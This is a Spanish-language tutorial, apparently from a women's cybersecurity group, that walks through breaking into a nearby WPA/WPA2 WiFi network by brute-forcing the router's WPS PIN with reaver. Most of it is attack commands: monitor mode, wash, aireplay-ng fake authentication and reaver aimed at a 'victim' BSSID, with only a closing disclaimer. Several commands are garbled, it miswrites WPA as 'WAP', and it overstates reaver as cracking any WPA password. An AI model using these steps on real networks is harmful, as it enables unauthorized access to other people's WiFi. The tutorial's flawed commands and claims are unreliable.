Todos sabemos que la mayoría de la gente prefiere poner una contraseña WiFi a su conexión inalámbrica. Esta puede ser tan simple como 12345 o tan compleja como una combinación de múltiples letras, números y caracteres. Bueno, aquí está la mala noticia, hay una herramienta con el nombre de reaver que se puede utilizar para descifrar su contraseña WAP/WAP2 WiFi.
Sobre WEP, WAP y WAP2
Para mejorar las funciones de WEP (Wired Equivalent Privacy), se creó en 2003 el Acceso Protegido WiFi o WPA. Esta mejora temporal sigue teniendo una seguridad relativamente pobre, pero es más fácil de configurar. WPA utiliza el Protocolo de Integridad de Clave Temporal (TKIP) para una encriptación más segura que la que ofrecía WEP.
Un año después, en 2004, estuvo disponible WiFi Protected Access 2. WPA2 tiene una seguridad más fuerte y es más fácil de configurar que las opciones anteriores. La principal diferencia con WPA2 es que utiliza el estándar de cifrado avanzado (AES) en lugar de TKIP.
Lo que necesitas.
- Un adaptador WiFi que soporte el modo monitor
- Un ordenador con WiFi
- Una red WiFi cercana con seguridad WPA
- Reaver instalado
- Persistencia
Estoy asumiendo que tu router está configurado para no usar la autenticación por botón.(PBC)
Hagamos esto
Primero, si estás usando una máquina virtual, tienes que habilitar tu controlador USB yendo a la configuración, luego haz clic en USB y elige tu dispositivo USB.
NB: Asegúrate de que el adaptador inalámbrico que estás usando soporta el modo monitor.
Después, ejecute el siguiente comando:
iwconfig
Este comando sólo muestra las interfaces inalámbricas
Luego ejecuta:
iwconfig wlan0 mode monitor
Este comando cambia el modo de modo gestionado a modo monitor.
El modo administrado es el modo por defecto para todos los dispositivos inalámbricos.
La razón por la que necesitamos cambiar el modo de administrado a modo monitor es porque no sólo queremos capturar los paquetes que tienen la dirección mac a nuestro dispositivo sino todos los paquetes, incluso los enviados al router y otros dispositivos. Esto sólo es posible cuando el adaptador WiFi está en modo monitor.
Entonces ejecuta:
sudo ifconfig wlan0 up
Esto hace que el wifi vuelva a funcionar.
Entonces ejecuta:
iwconfig
Esto es para comprobar si nuestro modo cambió de administrado a monitor. Si lo hizo, debería indicarse en el terminal.
La figura siguiente muestra que el modo cambió a monitor.
wash - interface wlan0
Esto muestra todos los Aps habilitados para WPS usando la interfaz inalámbrica.
Aireplay-ng - fakeauth 30 -a<bssid> -h <macid> wlan0
Para el ID de mac abre una nueva pestaña y escribe ifconfig. Copie los primeros 12 dígitos del unspec en wlan0.
NO HAGA EL INGRESO AÚN.
Abra otra pestaña nueva.
Asegúrese de que tiene reaver instalado. Si no lo tienes, ejecuta el siguiente comando.
Sudo apt-get install aircrack-ng reaver
Esto va a instalar reaver.
Reaver fuerza el pin y lo asocia con el objetivo, una vez que tiene el pin, lo utiliza para calcular la clave WAP/WAP2 real.
Luego ejecuta el siguiente comando:
Reaver - bssid<victim bssid> - channel <the channel of the victim> - interface wlan0 –vvv - no-associate
Pulsa enter en esta pestaña y también pulsa enter en la otra pestaña que te dije que no pulsaras enter.
Esto debería tardar un par de minutos ya que está probando todas las combinaciones posibles y finalmente te dará el pin WPS, la contraseña WAP y el nombre del Wi-Fi
DISCLAIMER. Este artículo es para fines de aprendizaje, no nos hacemos responsables de cualquier daño causado al referirse a él.
Artículo de Restercuter Nyawira, miembro de SheHacks KE, formadora y entusiasta de la ciberseguridad. Encuéntrala en LinkedIn (Restercuter Nyawira) y en Twitter @Restercuter1.